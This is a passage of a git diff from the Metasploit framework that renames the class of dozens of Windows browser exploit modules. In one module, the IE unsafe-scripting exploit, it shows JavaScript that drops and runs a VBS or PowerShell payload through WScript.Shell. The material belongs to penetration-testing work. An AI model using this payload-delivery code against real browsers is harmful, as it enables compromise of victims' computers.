@@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/barcode_ax49.rb b/modules/exploits/windows/browser/barcode_ax49.rb index bf6181bd25..e5fb4cc725 100644 --- a/modules/exploits/windows/browser/barcode_ax49.rb +++ b/modules/exploits/windows/browser/barcode_ax49.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb b/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb index 3a63699a2f..f883eb72e4 100644 --- a/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb +++ b/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/c6_messenger_downloaderactivex.rb b/modules/exploits/windows/browser/c6_messenger_downloaderactivex.rb index b4ffe3edf2..9936fc912d 100644 --- a/modules/exploits/windows/browser/c6_messenger_downloaderactivex.rb +++ b/modules/exploits/windows/browser/c6_messenger_downloaderactivex.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ca_brightstor_addcolumn.rb b/modules/exploits/windows/browser/ca_brightstor_addcolumn.rb index 62d06f8211..757ba12da7 100644 --- a/modules/exploits/windows/browser/ca_brightstor_addcolumn.rb +++ b/modules/exploits/windows/browser/ca_brightstor_addcolumn.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/chilkat_crypt_writefile.rb b/modules/exploits/windows/browser/chilkat_crypt_writefile.rb index 3a39839a25..8fe38efe5c 100644 --- a/modules/exploits/windows/browser/chilkat_crypt_writefile.rb +++ b/modules/exploits/windows/browser/chilkat_crypt_writefile.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/cisco_anyconnect_exec.rb b/modules/exploits/windows/browser/cisco_anyconnect_exec.rb index b5f802fa7f..55b5c6df4c 100644 --- a/modules/exploits/windows/browser/cisco_anyconnect_exec.rb +++ b/modules/exploits/windows/browser/cisco_anyconnect_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/cisco_playerpt_setsource.rb b/modules/exploits/windows/browser/cisco_playerpt_setsource.rb index 78466bd120..5b35ecdef3 100644 --- a/modules/exploits/windows/browser/cisco_playerpt_setsource.rb +++ b/modules/exploits/windows/browser/cisco_playerpt_setsource.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/cisco_playerpt_setsource_surl.rb b/modules/exploits/windows/browser/cisco_playerpt_setsource_surl.rb index 814fc873d2..199c27944b 100644 --- a/modules/exploits/windows/browser/cisco_playerpt_setsource_surl.rb +++ b/modules/exploits/windows/browser/cisco_playerpt_setsource_surl.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/citrix_gateway_actx.rb b/modules/exploits/windows/browser/citrix_gateway_actx.rb index 663b4945a0..58182c0a10 100644 --- a/modules/exploits/windows/browser/citrix_gateway_actx.rb +++ b/modules/exploits/windows/browser/citrix_gateway_actx.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/clear_quest_cqole.rb b/modules/exploits/windows/browser/clear_quest_cqole.rb index e9a1aced93..affe99692b 100644 --- a/modules/exploits/windows/browser/clear_quest_cqole.rb +++ b/modules/exploits/windows/browser/clear_quest_cqole.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/communicrypt_mail_activex.rb b/modules/exploits/windows/browser/communicrypt_mail_activex.rb index 3efacb9c49..d8f0fde955 100644 --- a/modules/exploits/windows/browser/communicrypt_mail_activex.rb +++ b/modules/exploits/windows/browser/communicrypt_mail_activex.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/creative_software_cachefolder.rb b/modules/exploits/windows/browser/creative_software_cachefolder.rb index 37adc9b873..f67dc5fa41 100644 --- a/modules/exploits/windows/browser/creative_software_cachefolder.rb +++ b/modules/exploits/windows/browser/creative_software_cachefolder.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/crystal_reports_printcontrol.rb b/modules/exploits/windows/browser/crystal_reports_printcontrol.rb index a92886b94d..44636c8495 100644 --- a/modules/exploits/windows/browser/crystal_reports_printcontrol.rb +++ b/modules/exploits/windows/browser/crystal_reports_printcontrol.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/dell_webcam_crazytalk.rb b/modules/exploits/windows/browser/dell_webcam_crazytalk.rb index fe8ede5cbd..f70773b7a5 100644 --- a/modules/exploits/windows/browser/dell_webcam_crazytalk.rb +++ b/modules/exploits/windows/browser/dell_webcam_crazytalk.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/dxstudio_player_exec.rb b/modules/exploits/windows/browser/dxstudio_player_exec.rb index 1b5560873d..fe938e1872 100644 --- a/modules/exploits/windows/browser/dxstudio_player_exec.rb +++ b/modules/exploits/windows/browser/dxstudio_player_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/zip' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ea_checkrequirements.rb b/modules/exploits/windows/browser/ea_checkrequirements.rb index 4ab495e851..89936e7a39 100644 --- a/modules/exploits/windows/browser/ea_checkrequirements.rb +++ b/modules/exploits/windows/browser/ea_checkrequirements.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ebook_flipviewer_fviewerloading.rb b/modules/exploits/windows/browser/ebook_flipviewer_fviewerloading.rb index 921285149b..ab90c7164f 100644 --- a/modules/exploits/windows/browser/ebook_flipviewer_fviewerloading.rb +++ b/modules/exploits/windows/browser/ebook_flipviewer_fviewerloading.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/enjoysapgui_comp_download.rb b/modules/exploits/windows/browser/enjoysapgui_comp_download.rb index 3d3cdf9c3c..0333976af5 100644 --- a/modules/exploits/windows/browser/enjoysapgui_comp_download.rb +++ b/modules/exploits/windows/browser/enjoysapgui_comp_download.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/enjoysapgui_preparetoposthtml.rb b/modules/exploits/windows/browser/enjoysapgui_preparetoposthtml.rb index a45a935ef6..2ee2ccff3b 100644 --- a/modules/exploits/windows/browser/enjoysapgui_preparetoposthtml.rb +++ b/modules/exploits/windows/browser/enjoysapgui_preparetoposthtml.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/facebook_extractiptc.rb b/modules/exploits/windows/browser/facebook_extractiptc.rb index 7290b5d166..571769f23d 100644 --- a/modules/exploits/windows/browser/facebook_extractiptc.rb +++ b/modules/exploits/windows/browser/facebook_extractiptc.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb b/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb index 66f3e99668..5f083c52da 100644 --- a/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb +++ b/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/getgodm_http_response_bof.rb b/modules/exploits/windows/browser/getgodm_http_response_bof.rb index 28762797c1..1adf60aa07 100644 --- a/modules/exploits/windows/browser/getgodm_http_response_bof.rb +++ b/modules/exploits/windows/browser/getgodm_http_response_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Seh diff --git a/modules/exploits/windows/browser/gom_openurl.rb b/modules/exploits/windows/browser/gom_openurl.rb index 1850394ce0..fe60d15fc8 100644 --- a/modules/exploits/windows/browser/gom_openurl.rb +++ b/modules/exploits/windows/browser/gom_openurl.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/greendam_url.rb b/modules/exploits/windows/browser/greendam_url.rb index a3394b541b..ee7e2634fe 100644 --- a/modules/exploits/windows/browser/greendam_url.rb +++ b/modules/exploits/windows/browser/greendam_url.rb @@ -21,7 +21,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/honeywell_hscremotedeploy_exec.rb b/modules/exploits/windows/browser/honeywell_hscremotedeploy_exec.rb index ec3f7c8ed2..34a7758163 100644 --- a/modules/exploits/windows/browser/honeywell_hscremotedeploy_exec.rb +++ b/modules/exploits/windows/browser/honeywell_hscremotedeploy_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/honeywell_tema_exec.rb b/modules/exploits/windows/browser/honeywell_tema_exec.rb index 13fa3b651c..4ce1c99493 100644 --- a/modules/exploits/windows/browser/honeywell_tema_exec.rb +++ b/modules/exploits/windows/browser/honeywell_tema_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/hp_alm_xgo_setshapenodetype_exec.rb b/modules/exploits/windows/browser/hp_alm_xgo_setshapenodetype_exec.rb index 550395255f..efa03912ab 100644 --- a/modules/exploits/windows/browser/hp_alm_xgo_setshapenodetype_exec.rb +++ b/modules/exploits/windows/browser/hp_alm_xgo_setshapenodetype_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/hp_easy_printer_care_xmlcachemgr.rb b/modules/exploits/windows/browser/hp_easy_printer_care_xmlcachemgr.rb index 55850db2a5..d6cbb5275a 100644 --- a/modules/exploits/windows/browser/hp_easy_printer_care_xmlcachemgr.rb +++ b/modules/exploits/windows/browser/hp_easy_printer_care_xmlcachemgr.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/hp_easy_printer_care_xmlsimpleaccessor.rb b/modules/exploits/windows/browser/hp_easy_printer_care_xmlsimpleaccessor.rb index 9276a059e5..9cb5e338c4 100644 --- a/modules/exploits/windows/browser/hp_easy_printer_care_xmlsimpleaccessor.rb +++ b/modules/exploits/windows/browser/hp_easy_printer_care_xmlsimpleaccessor.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/hp_loadrunner_addfile.rb b/modules/exploits/windows/browser/hp_loadrunner_addfile.rb index bc4efcd457..82ed60807c 100644 --- a/modules/exploits/windows/browser/hp_loadrunner_addfile.rb +++ b/modules/exploits/windows/browser/hp_loadrunner_addfile.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/hp_loadrunner_addfolder.rb b/modules/exploits/windows/browser/hp_loadrunner_addfolder.rb index 5b907dc8a2..09b0439c0c 100644 --- a/modules/exploits/windows/browser/hp_loadrunner_addfolder.rb +++ b/modules/exploits/windows/browser/hp_loadrunner_addfolder.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/hp_loadrunner_writefilebinary.rb b/modules/exploits/windows/browser/hp_loadrunner_writefilebinary.rb index e3d390f8eb..acff38f9ed 100644 --- a/modules/exploits/windows/browser/hp_loadrunner_writefilebinary.rb +++ b/modules/exploits/windows/browser/hp_loadrunner_writefilebinary.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/hp_loadrunner_writefilestring.rb b/modules/exploits/windows/browser/hp_loadrunner_writefilestring.rb index 5c62ea02a1..6488beed3a 100644 --- a/modules/exploits/windows/browser/hp_loadrunner_writefilestring.rb +++ b/modules/exploits/windows/browser/hp_loadrunner_writefilestring.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/hpmqc_progcolor.rb b/modules/exploits/windows/browser/hpmqc_progcolor.rb index dd64b699b0..19f0929c35 100644 --- a/modules/exploits/windows/browser/hpmqc_progcolor.rb +++ b/modules/exploits/windows/browser/hpmqc_progcolor.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/hyleos_chemviewx_activex.rb b/modules/exploits/windows/browser/hyleos_chemviewx_activex.rb index a56df9c525..873b2b876d 100644 --- a/modules/exploits/windows/browser/hyleos_chemviewx_activex.rb +++ b/modules/exploits/windows/browser/hyleos_chemviewx_activex.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking # heap spray :-/ include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ibm_spss_c1sizer.rb b/modules/exploits/windows/browser/ibm_spss_c1sizer.rb index a8488b29d4..76261ed22b 100644 --- a/modules/exploits/windows/browser/ibm_spss_c1sizer.rb +++ b/modules/exploits/windows/browser/ibm_spss_c1sizer.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ibm_tivoli_pme_activex_bof.rb b/modules/exploits/windows/browser/ibm_tivoli_pme_activex_bof.rb index 772a924e42..1f261d420a 100644 --- a/modules/exploits/windows/browser/ibm_tivoli_pme_activex_bof.rb +++ b/modules/exploits/windows/browser/ibm_tivoli_pme_activex_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ibmegath_getxmlvalue.rb b/modules/exploits/windows/browser/ibmegath_getxmlvalue.rb index f16b3b4c58..49dc3318e4 100644 --- a/modules/exploits/windows/browser/ibmegath_getxmlvalue.rb +++ b/modules/exploits/windows/browser/ibmegath_getxmlvalue.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ibmlotusdomino_dwa_uploadmodule.rb b/modules/exploits/windows/browser/ibmlotusdomino_dwa_uploadmodule.rb index c966b6145b..88ea81859f 100644 --- a/modules/exploits/windows/browser/ibmlotusdomino_dwa_uploadmodule.rb +++ b/modules/exploits/windows/browser/ibmlotusdomino_dwa_uploadmodule.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ie_cbutton_uaf.rb b/modules/exploits/windows/browser/ie_cbutton_uaf.rb index 96a4f7cfc7..e002ede87f 100644 --- a/modules/exploits/windows/browser/ie_cbutton_uaf.rb +++ b/modules/exploits/windows/browser/ie_cbutton_uaf.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb b/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb index 96741d004e..d00bae6af6 100644 --- a/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb +++ b/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ie_createobject.rb b/modules/exploits/windows/browser/ie_createobject.rb index 4b49aa83b6..7481aebffb 100644 --- a/modules/exploits/windows/browser/ie_createobject.rb +++ b/modules/exploits/windows/browser/ie_createobject.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ie_execcommand_uaf.rb b/modules/exploits/windows/browser/ie_execcommand_uaf.rb index 6db53caf87..bad5533df1 100644 --- a/modules/exploits/windows/browser/ie_execcommand_uaf.rb +++ b/modules/exploits/windows/browser/ie_execcommand_uaf.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ie_iscomponentinstalled.rb b/modules/exploits/windows/browser/ie_iscomponentinstalled.rb index 09d208386c..1e498607a4 100644 --- a/modules/exploits/windows/browser/ie_iscomponentinstalled.rb +++ b/modules/exploits/windows/browser/ie_iscomponentinstalled.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Seh diff --git a/modules/exploits/windows/browser/ie_setmousecapture_uaf.rb b/modules/exploits/windows/browser/ie_setmousecapture_uaf.rb index 1be71a45b7..6c8d41af0e 100644 --- a/modules/exploits/windows/browser/ie_setmousecapture_uaf.rb +++ b/modules/exploits/windows/browser/ie_setmousecapture_uaf.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/windows/browser/ie_unsafe_scripting.rb b/modules/exploits/windows/browser/ie_unsafe_scripting.rb index caab7e277b..3db44238f6 100644 --- a/modules/exploits/windows/browser/ie_unsafe_scripting.rb +++ b/modules/exploits/windows/browser/ie_unsafe_scripting.rb @@ -7,17 +7,27 @@ require 'msf/core' require 'msf/util/exe' require 'msf/core/exploit/powershell' -class Metasploit3 < Msf::Exploit::Remote - Rank = ExcellentRanking +class MetasploitModule < Msf::Exploit::Remote - include Msf::Exploit::Remote::HttpServer::HTML + Rank = ManualRanking + + include Msf::Exploit::Remote::BrowserExploitServer include Msf::Exploit::EXE include Msf::Exploit::Powershell + VULN_CHECK_JS = %Q| + try { + new ActiveXObject("WScript.Shell"); + new ActiveXObject("Scripting.FileSystemObject"); + is_vuln = true; + } catch(e) {} + | + + def initialize(info = {}) super(update_info(info, - 'Name' => 'Microsoft Internet Explorer Unsafe Scripting Misconfiguration', - 'Description' => %q{ + 'Name' => 'Microsoft Internet Explorer Unsafe Scripting Misconfiguration', + 'Description' => %q{ This exploit takes advantage of the "Initialize and script ActiveX controls not marked safe for scripting" setting within Internet Explorer. When this option is set, IE allows access to the WScript.Shell ActiveX control, which allows javascript to @@ -36,43 +46,77 @@ class Metasploit3 < Msf::Exploit::Remote IE Tabs, WScript and subsequent Powershell prompts all run as x86 even when run from an x64 iexplore.exe. + + By default, this module will not attempt to fire against IEs that come with Protected + Mode enabled by default, because it can trigger a security prompt. However, if you are + feeling brave, you can choose to ignore this restriction by setting the ALLOWPROMPT + datastore option to true. }, - 'License' => MSF_LICENSE, - 'Author' => + 'License' => MSF_LICENSE, + 'Author' => [ 'natron', 'Ben Campbell' # PSH and remove ADODB.Stream ], - 'References' => + 'References' => [ [ 'URL', 'http://support.microsoft.com/kb/182569' ], [ 'URL', 'http://blog.invisibledenizen.org/2009/01/ieunsafescripting-metasploit-module.html' ], [ 'URL', 'http://support.microsoft.com/kb/870669'] ], - 'DisclosureDate' => 'Sep 20 2010', - 'Platform' => 'win', - 'Targets' => + 'DisclosureDate' => 'Sep 20 2010', + 'Platform' => 'win', + 'BrowserRequirements' => { + source: 'script', + os_name: OperatingSystems::Match::WINDOWS, + ua_name: HttpClients::IE, + vuln_test: VULN_CHECK_JS, + vuln_test_error: 'WScript.Shell or Scripting.FileSystemObject not allowed by browser.' + }, + 'Arch' => ARCH_X86, + 'Targets' => [ - [ 'Windows x86/x64', { 'Arch' => ARCH_X86 } ] + [ 'Windows x86/x64', {} ] ], - 'DefaultOptions' => + 'DefaultOptions' => { 'HTTP::compression' => 'gzip' }, - 'DefaultTarget' => 0)) + 'DefaultTarget' => 0 + )) register_options( [ - OptEnum.new('TECHNIQUE', [true, 'Delivery technique (VBS Exe Drop or PSH CMD)', 'VBS', ['VBS','Powershell']]), + OptBool.new('ALLOWPROMPT', [true, 'Allow exploit to ignore the protected mode prompt', false]), + OptEnum.new('TECHNIQUE', [true, 'Delivery technique (VBS Exe Drop or PSH CMD)', 'VBS', ['VBS','Powershell']]) ], self.class ) end - def on_request_uri(cli, request) + # Unfortunately we don't currently have an explicit way to check whether Protected Mode is + # actually enabled or not, so we can only rely on whatever is default on the OS. This should + # allow BAP2 to always fire without worrying about the prmopt popping up, but the user can + # still ignore this by setting ALLOWPROMPT to true in standalone mode. + def has_protected_mode_prompt?(browser) + if datastore['ALLOWPROMPT'] + return false + elsif OperatingSystems::Match::WINDOWS_XP === browser[:os_name] + return false + end + + true + end + + def on_request_exploit(cli, request, browser) + if has_protected_mode_prompt?(browser) + print_warning("This target possibly has Protected Mode, exploit aborted.") + send_not_found(cli) + return + end # Build out the HTML response page - var_shellobj = rand_text_alpha(rand(5)+5) + var_shellobj = rand_text_alpha(rand(5)+5) p = regenerate_payload(cli) if datastore['TECHNIQUE'] == 'VBS' @@ -92,10 +136,10 @@ class Metasploit3 < Msf::Exploit::Remote end def vbs_technique(var_shellobj, p) - var_fsobj = rand_text_alpha(rand(5)+5) - var_fsobj_file = rand_text_alpha(rand(5)+5) - var_vbsname = rand_text_alpha(rand(5)+5) - var_writedir = rand_text_alpha(rand(5)+5) + var_fsobj = rand_text_alpha(rand(5)+5) + var_fsobj_file = rand_text_alpha(rand(5)+5) + var_vbsname = rand_text_alpha(rand(5)+5) + var_writedir = rand_text_alpha(rand(5)+5) exe = generate_payload_exe({ :code => p.encoded }) vbs = Msf::Util::EXE.to_exe_vbs(exe) @@ -103,7 +147,7 @@ class Metasploit3 < Msf::Exploit::Remote # Build the javascript that will be served js_content = %Q| -//<html><head></head><body><script> +<html><head></head><body><script> var #{var_shellobj} = new ActiveXObject("WScript.Shell"); var #{var_fsobj} = new ActiveXObject("Scripting.FileSystemObject"); var #{var_writedir} = #{var_shellobj}.ExpandEnvironmentStrings("%TEMP%"); @@ -114,20 +158,20 @@ var #{var_fsobj_file} = #{var_fsobj}.OpenTextFile(#{var_writedir} + "\\\\" + "#{ #{var_shellobj}.run("wscript.exe " + #{var_writedir} + "\\\\" + "#{var_vbsname}.vbs", 1, true); #{var_fsobj}.DeleteFile(#{var_writedir} + "\\\\" + "#{var_vbsname}.vbs"); -//</script></html> +</script></html> | - return js_content + js_content end def psh_technique(var_shellobj, p) cmd = Rex::Text.to_hex(cmd_psh_payload(payload.encoded, payload_instance.arch.first)) js_content = %Q| -//<html><head></head><body><script> +<html><head></head><body><script> var #{var_shellobj} = new ActiveXObject("WScript.Shell"); #{var_shellobj}.run(unescape("#{cmd}"), 1, true); -//</script></html> +</script></html> | - return js_content + js_content end end diff --git a/modules/exploits/windows/browser/imgeviewer_tifmergemultifiles.rb b/modules/exploits/windows/browser/imgeviewer_tifmergemultifiles.rb index fa0e081109..26459acef3 100644 --- a/modules/exploits/windows/browser/imgeviewer_tifmergemultifiles.rb +++ b/modules/exploits/windows/browser/imgeviewer_tifmergemultifiles.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML @@ -40,7 +40,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'process', - 'DisablePayloadHandler' => 'false', + 'DisablePayloadHandler' => false, 'InitialAutoRunScript' => 'migrate -f' }, 'Payload' => diff --git a/modules/exploits/windows/browser/indusoft_issymbol_internationalseparator.rb b/modules/exploits/windows/browser/indusoft_issymbol_internationalseparator.rb index 8abc7a8ae0..0a0583a308 100644 --- a/modules/exploits/windows/browser/indusoft_issymbol_internationalseparator.rb +++ b/modules/exploits/windows/browser/indusoft_issymbol_internationalseparator.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/inotes_dwa85w_bof.rb b/modules/exploits/windows/browser/inotes_dwa85w_bof.rb index d9bc4a1265..66e44e1579 100644 --- 